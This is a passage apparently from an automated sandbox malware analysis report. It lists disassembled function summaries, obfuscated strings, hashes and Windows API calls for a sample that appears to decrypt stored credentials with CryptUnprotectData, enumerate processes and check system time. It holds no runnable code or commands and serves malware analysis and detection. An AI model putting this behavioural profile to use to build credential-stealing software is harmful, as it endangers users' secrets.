                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID: Ng
                            • API String ID: 4291131564-1495073516
                            • Opcode ID: 41256c9d518fc115ebdfd936379710ba77d4b1b5e06a024b016b4850d7cda2c5
                            • Instruction ID: 3154d49ebbc7ae7ec139f4d557689ce246acec7e18d81f5dec07f29101af5bea
                            • Opcode Fuzzy Hash: 41256c9d518fc115ebdfd936379710ba77d4b1b5e06a024b016b4850d7cda2c5
                            • Instruction Fuzzy Hash: 1C11A4B4240308AFEB14CF64DC95FAA77B5FB89B00F208158F9199B390C775A901CB50
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: EO}+$Sdwv$cr^G$d3M$pkW=
                            • API String ID: 0-643821518
                            • Opcode ID: c7eb64b38e76a962f117e0b8adfcf33b61beab303710bfa00493664e313b187b
                            • Instruction ID: ea655a01477d527ff2c30bf4da6e0d00b9cf21c0cbb157ffd78852ad3504e261
                            • Opcode Fuzzy Hash: c7eb64b38e76a962f117e0b8adfcf33b61beab303710bfa00493664e313b187b
                            • Instruction Fuzzy Hash: F6B2D7F3608204AFE304AE2DEC8567ABBE5EFD4720F16893DE6C5C7744EA3558018697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: &;>$5GY$6j'Y$`(_|$~[<
                            • API String ID: 0-3502887050
                            • Opcode ID: d5a833f8cf379d1b36eccc4251990e3b95300e97517a72ffd17190cd32e4d59d
                            • Instruction ID: 29cf3b396059803df964db8f7dbbafdfc86cf25aa24da5bfbb041a9e28767ab7
                            • Opcode Fuzzy Hash: d5a833f8cf379d1b36eccc4251990e3b95300e97517a72ffd17190cd32e4d59d
                            • Instruction Fuzzy Hash: B0B227F360C2049FE304AE2DEC8567ABBE9EFD4720F1A893DE5C5C3744EA3558058696
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: (8mt$:yL$RFUu$gQm$y _
                            • API String ID: 0-473400732
                            • Opcode ID: 5fa18fb3b68e7ae7598ee8119a946eadad509039242de1c18bb8d756ded0c628
                            • Instruction ID: 2ed82476f07d00d5259b844a0724873600d3ba7788d515631be3faf4e5e04d5a
                            • Opcode Fuzzy Hash: 5fa18fb3b68e7ae7598ee8119a946eadad509039242de1c18bb8d756ded0c628
                            • Instruction Fuzzy Hash: 9CB2F4F39083049FE3046E29EC8567ABBE9EF94720F1A493DEAC4C7740E67558058797
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0067C871
                            • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0067C87C
                            • lstrcat.KERNEL32(?,00690B46), ref: 0067C943
                            • lstrcat.KERNEL32(?,00690B47), ref: 0067C957
                            • lstrcat.KERNEL32(?,00690B4E), ref: 0067C978
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 3f9f0845b1e7797374568ddedf1165cbc470e0c952b406703a7f516bcc68d42b
                            • Instruction ID: 6ece2e81ce05e6ca1425599328fa24c0df0e19ced32f71f819004efeef6eda45
                            • Opcode Fuzzy Hash: 3f9f0845b1e7797374568ddedf1165cbc470e0c952b406703a7f516bcc68d42b
                            • Instruction Fuzzy Hash: 714180B5D0420AEFDB54DF90DD89BFEB7B9BB48304F1042A8E609A7280D7705A84CF91
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 0068696C
                            • sscanf.NTDLL ref: 00686999
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006869B2
                            • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006869C0
                            • ExitProcess.KERNEL32 ref: 006869DA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$System$File$ExitProcesssscanf
                            • String ID:
                            • API String ID: 2533653975-0
                            • Opcode ID: 415890d610d2e2337a9a515fe5a535db1d3236549c6bc4d050ee916453f8cec0
                            • Instruction ID: 299c8b91fd896bf89b241b7daa7f650555cff66a8c5fbc55e2baf1bb6fa89078
                            • Opcode Fuzzy Hash: 415890d610d2e2337a9a515fe5a535db1d3236549c6bc4d050ee916453f8cec0
                            • Instruction Fuzzy Hash: 1621CBB5D14209ABCF48EFE4D9459EEB7B6FF48300F04866EE406E3250EB345605CB69
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0067724D
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00677254
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00677281
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006772A4
                            • LocalFree.KERNEL32(?), ref: 006772AE
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: 76d098f3c200b16b87b9d236cfc09bb2e0b827e5774a46be384682c0ea906f2d
                            • Instruction ID: 204b01f46e583daab563df35c862eed721fd0b5c8b97f9f1bd0c94defb54d8ed
                            • Opcode Fuzzy Hash: 76d098f3c200b16b87b9d236cfc09bb2e0b827e5774a46be384682c0ea906f2d
                            • Instruction Fuzzy Hash: 8F010075A40208BBEB14DFD4CD45F9E7779BB44701F108154FB19AA2C0D670AA018B65
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0068961E
                            • Process32First.KERNEL32(00690ACA,00000128), ref: 00689632
                            • Process32Next.KERNEL32(00690ACA,00000128), ref: 00689647
                            • StrCmpCA.SHLWAPI(?,00000000), ref: 0068965C
                            • CloseHandle.KERNEL32(00690ACA), ref: 0068967A
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                             • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                            • String ID:
                            • API String ID: 420147892-0
                            • Opcode ID: 3e4eacc186ebae7ee4121297dcc9550c381f9f1c209168b7adf801498ac086e1
                            • Instruction ID: 8f3726e0a0c4de28437b0f9f9d5eb2f72574c778031e13d1a3bcbab25c184042
                            • Opcode Fuzzy Hash: 3e4eacc186ebae7ee4121297dcc9550c381f9f1c209168b7adf801498ac086e1
                            • Instruction Fuzzy Hash: 56010C75A00208ABDB14DFA5DD58BEDB7F9FB48700F144398A905A6250EB349B80DF61
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: Q$'){U$G $]k/
                            • API String ID: 0-2226023284
                            • Opcode ID: d489f2c6b780d046c0edc26cd9c3c4470a3a2417a1ffe2a7d952145c6a2bc9fb
                            • Instruction ID: fe4afe9f2d47616b8490ae450c738c2923cdd6d6a3f4540656f8a5288bf00674
                            • Opcode Fuzzy Hash: d489f2c6b780d046c0edc26cd9c3c4470a3a2417a1ffe2a7d952145c6a2bc9fb
                            • Instruction Fuzzy Hash: 87B2E5F360C200AFE704AE29EC8577AFBE5EF94720F1A493DEAC487744E63558058697
                            APIs
                            • CryptBinaryToStringA.CRYPT32(00000000,00675184,40000001,00000000,00000000,?,00675184), ref: 00688EC0
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptString
                            • String ID:
                            • API String ID: 80407269-0
                            • Opcode ID: eb6d2fc5bbbcf265ef230675e0ef01f988e7d0b6758c404b98c0c14c5c9094d3
                            • Instruction ID: 10e97aea663fcae5b47ca6c714858987213b813352b3804a7d3ff10bc83d59dc
                            • Opcode Fuzzy Hash: eb6d2fc5bbbcf265ef230675e0ef01f988e7d0b6758c404b98c0c14c5c9094d3
                            • Instruction Fuzzy Hash: 4D112A70200208FFDB04DF64E888FAB37AABF89340F509658FA198B250DB75EC41DB60
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,012BEE68,00000000,?,00690E10,00000000,?,00000000,00000000), ref: 00687A63
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00687A6A
                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,012BEE68,00000000,?,00690E10,00000000,?,00000000,00000000,?), ref: 00687A7D
                            • wsprintfA.USER32 ref: 00687AB7
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID:
                            • API String ID: 3317088062-0
                            • Opcode ID: cf214e382b6bc969a1315564be05b9c052f228caaf1f68bbe5e48e3608801d9c
                            • Instruction ID: cd833c300c492939a18393ee66f777b21d78d496e681a677704ac979c0f8e4df
                            • Opcode Fuzzy Hash: cf214e382b6bc969a1315564be05b9c052f228caaf1f68bbe5e48e3608801d9c
                            • Instruction Fuzzy Hash: 52118EB1945218EBEB249B54DC49FA9B778FB04721F1043AAE91A932C0D7745A40CF91
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: -}$U%w{$a?g
                            • API String ID: 0-1225954905
                            • Opcode ID: 57c32c4e15387565f05dfdb0ef3f1dfb24979a90f1ae45cd28b54361442001ba
                            • Instruction ID: 241ca43925c4932b13242017c7079a627f5b07c8931156385ef496c9096d5209
                            • Opcode Fuzzy Hash: 57c32c4e15387565f05dfdb0ef3f1dfb24979a90f1ae45cd28b54361442001ba
                            • Instruction Fuzzy Hash: 81B205F360C2049FE7046E2DEC8567ABBE9EF94320F1A463DEAC4C7744EA3558058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1366641315.00000000008CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                            • Associated: 00000000.00000002.1366348513.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000721000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.000000000072D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.0000000000752000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366369367.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000A59000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B51000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B5C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1366641315.0000000000B6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367399051.0000000000B6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367500286.0000000000D07000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1367516409.0000000000D08000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_670000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: j.]y$zoo${W{;
